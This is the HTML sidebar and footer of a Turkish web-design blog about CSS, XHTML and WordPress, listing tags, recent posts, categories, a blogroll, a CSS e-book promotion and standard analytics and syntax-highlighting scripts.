<a href='http://www.fatihhayrioglu.com/tag/ie6/' class='tag-link-295' title='7 topics' rel="tag" style='font-size: 8pt;'>ie6</a>
<a href='http://www.fatihhayrioglu.com/tag/ie7/' class='tag-link-58' title='10 topics' rel="tag" style='font-size: 8.2592592592593pt;'>ie7</a>
<a href='http://www.fatihhayrioglu.com/tag/ie8/' class='tag-link-39' title='9 topics' rel="tag" style='font-size: 8.1728395061728pt;'>ie8</a>
<a href='http://www.fatihhayrioglu.com/tag/internet-explorer/' class='tag-link-130' title='11 topics' rel="tag" style='font-size: 8.3456790123457pt;'>internet explorer</a>
<a href='http://www.fatihhayrioglu.com/tag/javascript/' class='tag-link-8' title='77 topics' rel="tag" style='font-size: 14.049382716049pt;'>Javascript</a>
<a href='http://www.fatihhayrioglu.com/tag/jquery/' class='tag-link-27' title='58 topics' rel="tag" style='font-size: 12.407407407407pt;'>jquery</a>
<a href='http://www.fatihhayrioglu.com/tag/kitaplar/' class='tag-link-7' title='43 topics' rel="tag" style='font-size: 11.111111111111pt;'>Kitaplar</a>
<a href='http://www.fatihhayrioglu.com/tag/lightbox/' class='tag-link-28' title='14 topics' rel="tag" style='font-size: 8.6049382716049pt;'>lightbox</a>
<a href='http://www.fatihhayrioglu.com/tag/menu/' class='tag-link-228' title='11 topics' rel="tag" style='font-size: 8.3456790123457pt;'>menü</a>
<a href='http://www.fatihhayrioglu.com/tag/microsoft/' class='tag-link-102' title='9 topics' rel="tag" style='font-size: 8.1728395061728pt;'>microsoft</a>
<a href='http://www.fatihhayrioglu.com/tag/mootools/' class='tag-link-21' title='13 topics' rel="tag" style='font-size: 8.5185185185185pt;'>mootools</a>
<a href='http://www.fatihhayrioglu.com/tag/opera/' class='tag-link-311' title='8 topics' rel="tag" style='font-size: 8.0864197530864pt;'>Opera</a>
<a href='http://www.fatihhayrioglu.com/tag/rss/' class='tag-link-47' title='10 topics' rel="tag" style='font-size: 8.2592592592593pt;'>rss</a>
<a href='http://www.fatihhayrioglu.com/tag/safari/' class='tag-link-443' title='9 topics' rel="tag" style='font-size: 8.1728395061728pt;'>safari</a>
<a href='http://www.fatihhayrioglu.com/tag/table/' class='tag-link-339' title='7 topics' rel="tag" style='font-size: 8pt;'>table</a>
<a href='http://www.fatihhayrioglu.com/tag/tipografi/' class='tag-link-45' title='10 topics' rel="tag" style='font-size: 8.2592592592593pt;'>tipografi</a>
<a href='http://www.fatihhayrioglu.com/tag/web/' class='tag-link-116' title='10 topics' rel="tag" style='font-size: 8.2592592592593pt;'>web</a>
<a href='http://www.fatihhayrioglu.com/tag/web20/' class='tag-link-269' title='19 topics' rel="tag" style='font-size: 9.037037037037pt;'>web2.0</a>
<a href='http://www.fatihhayrioglu.com/tag/web-standartlari/' class='tag-link-4' title='49 topics' rel="tag" style='font-size: 11.62962962963pt;'>Web Standartları</a>
<a href='http://www.fatihhayrioglu.com/tag/wordpress/' class='tag-link-9' title='62 topics' rel="tag" style='font-size: 12.753086419753pt;'>WordPress</a>
<a href='http://www.fatihhayrioglu.com/tag/xhtml/' class='tag-link-10' title='65 topics' rel="tag" style='font-size: 13.012345679012pt;'>XHTML</a>
<a href='http://www.fatihhayrioglu.com/tag/yahoo/' class='tag-link-264' title='11 topics' rel="tag" style='font-size: 8.3456790123457pt;'>yahoo</a>
<a href='http://www.fatihhayrioglu.com/tag/yui/' class='tag-link-22' title='7 topics' rel="tag" style='font-size: 8pt;'>yui</a></div></div>
<h4><span>Son yazılar</span></h4>
<ul class="lastPost">		
 <!--This call the last 10 post - Change the number 10 to insert more or less posts-->
	<li><a href="http://www.fatihhayrioglu.com/xslt-ipucu-bosluk-karakteri-kullanimi/" rel="bookmark" title="Permanent Link to xslt ipucu: boşluk karakteri kullanımı">xslt ipucu: boşluk karakteri kullanımı (3 yorum)
	<span>26-11</span></a></li>							
 <!--This call the last 10 post - Change the number 10 to insert more or less posts-->
	<li><a href="http://www.fatihhayrioglu.com/hacklendik/" rel="bookmark" title="Permanent Link to Hacklendik">Hacklendik (26 yorum)
	<span>18-11</span></a></li>							
 <!--This call the last 10 post - Change the number 10 to insert more or less posts-->
	<li><a href="http://www.fatihhayrioglu.com/css-ile-resim-haritalariimagemap-yapmak/" rel="bookmark" title="Permanent Link to CSS ile Resim Haritaları(imagemap) yapmak">CSS ile Resim Haritaları(imagemap) yapmak (12 yorum)
	<span>17-11</span></a></li>							
 <!--This call the last 10 post - Change the number 10 to insert more or less posts-->
	<li><a href="http://www.fatihhayrioglu.com/css-ile-basit-sekilde-fare-uzerine-gelincerollover-resim-degisimi-yapmak/" rel="bookmark" title="Permanent Link to CSS ile Basit Şekilde Fare Üzerine Gelince(Rollover) Resim Değişimi Yapmak">CSS ile Basit Şekilde Fare Üzerine Gelince(Rollover) Resim Değişimi Yapmak (12 yorum)
	<span>10-11</span></a></li>							
 <!--This call the last 10 post - Change the number 10 to insert more or less posts-->
	<li><a href="http://www.fatihhayrioglu.com/css-ile-yuzde-cubugu-hazirlama/" rel="bookmark" title="Permanent Link to CSS ile Yüzde Çubuğu Hazırlama">CSS ile Yüzde Çubuğu Hazırlama (15 yorum)
	<span>6-11</span></a></li>							
 <!--This call the last 10 post - Change the number 10 to insert more or less posts-->
	<li><a href="http://www.fatihhayrioglu.com/en-cok-kullandigim-css-hilelerihack/" rel="bookmark" title="Permanent Link to En çok kullandığım CSS Hileleri(Hack)">En çok kullandığım CSS Hileleri(Hack) (13 yorum)
	<span>3-11</span></a></li>							
 <!--This call the last 10 post - Change the number 10 to insert more or less posts-->
	<li><a href="http://www.fatihhayrioglu.com/firebug-ipucu-firebugin-yetenekleri/" rel="bookmark" title="Permanent Link to FireBug İpucu : FireBug&#8217;ın Yetenekleri">FireBug İpucu : FireBug&#8217;ın Yetenekleri (8 yorum)
	<span>23-10</span></a></li>							
 <!--This call the last 10 post - Change the number 10 to insert more or less posts-->
	<li><a href="http://www.fatihhayrioglu.com/firefox-31-yenilikleri/" rel="bookmark" title="Permanent Link to Firefox 3.1 Yenilikleri">Firefox 3.1 Yenilikleri (5 yorum)
	<span>21-10</span></a></li>							
 <!--This call the last 10 post - Change the number 10 to insert more or less posts-->
	<li><a href="http://www.fatihhayrioglu.com/sitemi-temizleme-ve-hizlandirma-calismalarim/" rel="bookmark" title="Permanent Link to Sitemi temizleme ve hızlandırma çalışmalarım">Sitemi temizleme ve hızlandırma çalışmalarım (7 yorum)
	<span>16-10</span></a></li>							
 <!--This call the last 10 post - Change the number 10 to insert more or less posts-->
	<li><a href="http://www.fatihhayrioglu.com/javascript%e2%80%99te-parantez-takibi/" rel="bookmark" title="Permanent Link to Javascript&#8217;te Parantez Takibi">Javascript&#8217;te Parantez Takibi (18 yorum)
	<span>9-10</span></a></li>							
</ul>

	<div class="bb-tbase">
	<div class="bb-t13 bb-fa"><div class="bbin-c1">
		<div id="categories-239743571" class="widget widget_categories"><h4><span>Kategoriler</span></h4>		<ul>
			<li class="cat-item cat-item-2"><a href="http://www.fatihhayrioglu.com/category/ajax/" title="Yeni teknoloji ajax hakkında">Ajax</a> (2)
</li>
	<li class="cat-item cat-item-6"><a href="http://www.fatihhayrioglu.com/category/aspnet/" title="Her nekadar not defterimi(blog) php(WordPress) den aldıysamda aslen ASP.NET uğraşmaktayım. ">ASP.NET</a> (3)
</li>
	<li class="cat-item cat-item-3"><a href="http://www.fatihhayrioglu.com/category/css/" title="CSS kategorisi altındaki tüm yazıları göster">CSS</a> (108)
</li>
	<li class="cat-item cat-item-1"><a href="http://www.fatihhayrioglu.com/category/haberler/" title="Haberler kategorisi altındaki tüm yazıları göster">Haberler</a> (247)
</li>
	<li class="cat-item cat-item-8"><a href="http://www.fatihhayrioglu.com/category/javascript/" title="Javascript kategorisi altındaki tüm yazıları göster">Javascript</a> (27)
</li>
	<li class="cat-item cat-item-7"><a href="http://www.fatihhayrioglu.com/category/kitaplar/" title="Kitaplar kategorisi altındaki tüm yazıları göster">Kitaplar</a> (74)
</li>
	<li class="cat-item cat-item-11"><a href="http://www.fatihhayrioglu.com/category/sql/" title="Sql kategorisi altındaki tüm yazıları göster">Sql</a> (2)
</li>
	<li class="cat-item cat-item-4"><a href="http://www.fatihhayrioglu.com/category/web-standartlari/" title="Web Standartları kategorisi altındaki tüm yazıları göster">Web Standartları</a> (58)
</li>
	<li class="cat-item cat-item-9"><a href="http://www.fatihhayrioglu.com/category/wordpress/" title="WordPress kategorisi altındaki tüm yazıları göster">WordPress</a> (11)
</li>
	<li class="cat-item cat-item-10"><a href="http://www.fatihhayrioglu.com/category/xhtml/" title="XHTML kategorisi altındaki tüm yazıları göster">XHTML</a> (71)
</li>
		</ul>
</div>		<div id="meta" class="widget widget_meta">			<h4><span>Siteye Giriş</span></h4>			<ul>
			<li><a href="http://www.fatihhayrioglu.com/wp-login.php?action=register">Kayıt ol</a></li>			<li><a href="http://www.fatihhayrioglu.com/wp-login.php">Giriş</a></li>
			<li><a href="http://www.fatihhayrioglu.com/feed/" title="RSS 2.0 ile bu siteye abone olun">Yazılar <abbr title="Really Simple Syndication">RSS</abbr></a></li>
			<li><a href="http://www.fatihhayrioglu.com/comments/feed/" title="Tüm yazılara yapılan son yorumlar (RSS biçiminde)">Yorumlar <abbr title="Really Simple Syndication">RSS</abbr></a></li>
			<li><a href="http://wordpress.org/" title="WordPress&#039;in desteğiyle, kişisel yayımlama ortamı">WordPress.org</a></li>
						</ul>
		</div>	</div></div>
	<div class="bb-t16 bb-fc">
		<div id="linkcat-14" class="widget widget_links"><h4><span>Linkler</span></h4>
	<ul class='xoxo blogroll'>
<li><a href="http://altiustutasarim.com" title="Mehmet Doğan&#8217;ın sitesi">altiustutasarim</a></li>
<li><a href="http://www.cangurbuz.com/" title="Tasarım&#8217;da bir numara">Can Gürbüz</a></li>
<li><a href="http://forum.ceviz.net" title="Forumların en güzeli (tabi bana göre)">ceviz.net</a></li>
<li><a href="http://www.jayhoon.com/" title="Türkiye Amerikan Futbol Oyuncu + web amelesi(meslekdaş)">Ceyhun</a></li>
<li><a href="http://cssbahcesi.com" title="Css Bahçesi web tasarımcılar için iyi tasarlanmış css tabanlı sayfalardan oluşan bir veritabanı oluşturmayı hedefleyen bir projedir.">CSS Bahçesi</a></li>
<li><a href="http://cssgaleri.com" title="CSS ile oluşturulmuş siteler topluluğu">CSS Galeri</a></li>
<li><a href="http://dw.gen.tr" title="Dreamweaver Hakkında güzel bir Türkçe kaynak">Dreamweaver Sayfası</a></li>
<li><a href="http://www.eburhan.com/" title="Başarılı bir web günlüğü">eburhan</a></li>
<li><a href="http://www.fatihturan.com/">fatihturan</a></li>
<li><a href="http://www.gfxdizayn.com/">gfx</a></li>
<li><a href="http://www.h-yaman.com/">h-yaman</a></li>
<li><a href="http://hasanyalcin.com">Hasan Yalçın</a></li>
<li><a href="http://karbonizma.blogspot.com/" title="Web Yöneticileri İçin Kaynaklar ve Araçlar, Web Tasarımı ve Web Trendleri üzerine paylaşımlar.">karbonizma</a></li>
<li><a href="http://www.kudretkeskin.com/" title="Babayiğit bir tasarımcı">Kudret Keskin</a></li>
<li><a href="http://www.meslektas.net/" title="meslek erbabının yeri">meslektaş</a></li>
<li><a href="http://www.sesebian.com/" title="Güncel konuların yazıldığı web günlüğü.">Sesebian</a></li>
<li><a href="http://webdeneyimleri.donanimhaber.com/" title="web deneyimleri">web deneyimleri</a></li>
<li><a href="http://www.yakuter.com/" title="web tasarım muhabbetleri">yakuter</a></li>
<li><a href="http://forum.zoque.net/" title="Güzel ve yararlı bir forum">zoque forum</a></li>

	</ul>
</div>
<br />
			</div>
	</div>

	<div class="bb-tbase">		<div id="text-239739561" class="widget widget_text">			<h4><span>Kitap</span></h4>			<div class="textwidget"><a style="border-bottom: medium none; text-decoration: none;" href="http://www.fatihhayrioglu.com/?page_id=461">
<img height="293" border="0" width="170" alt="CSS'e başlangıç" src="/images/kitap_sag.gif" class="alignleft" />
</a>Uzun süredir üzerinde çalıştığım CSS’e başlangıç kitabımı bitirdim. Aslında buna bir kitap demek ne kadar doğru bilmiyorum. Tam doğru tanımı makalelerimin derlenip düzenli hale getirildiği bir e-doküman demek daha doğru olur.
Bu kitap makalelerimi derleyip hazırladığım ilk kitap. İnşallah ikinci kitabıda yazmayı düşünüyorum. Zaman ve imkânlar nispetinde 2. kitapta çıkacaktır.</div>
		</div></div>
</div></div>

</div><!--content-->
<div id="footer" class="bb-tbase">
	
		
			<p><a href="http://wordpress.org/">WordPress</a> 
			alt yapısı ve <a href="http://konstruktors.com/WordPressTheme/SansserifRacer" title="Sans-serif Racer WordPress Theme">Sans-serif Racer</a> teması kullanılmıştır.</p>
		
	
	
</div>

</div><!--soul-content-->
</div><!--soul-->

<!-- SyntaxHighlighter Stuff -->
<script type="text/javascript" src="http://www.fatihhayrioglu.com/wp-content/plugins/syntaxhighlighter/files/shCore.js"></script>
<script type="text/javascript" src="http://www.fatihhayrioglu.com/wp-content/plugins/syntaxhighlighter/files/shBrushXml.js"></script>
<script type="text/javascript" src="http://www.fatihhayrioglu.com/wp-content/plugins/syntaxhighlighter/files/shBrushCss.js"></script>
<script type="text/javascript">
	dp.SyntaxHighlighter.ClipboardSwf = 'http://www.fatihhayrioglu.com/wp-content/plugins/syntaxhighlighter/files/clipboard.swf';
	dp.SyntaxHighlighter.HighlightAll('code');
</script>

<script src="/js/genel.js" type="text/javascript"></script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-785768-1");
pageTracker._initData();
pageTracker._trackPageview();
</script>
</body>
</html>

<!-- Dynamic Page Served (once) in 0.519 seconds -->
<!-- Cached page served by WP-Cache -->
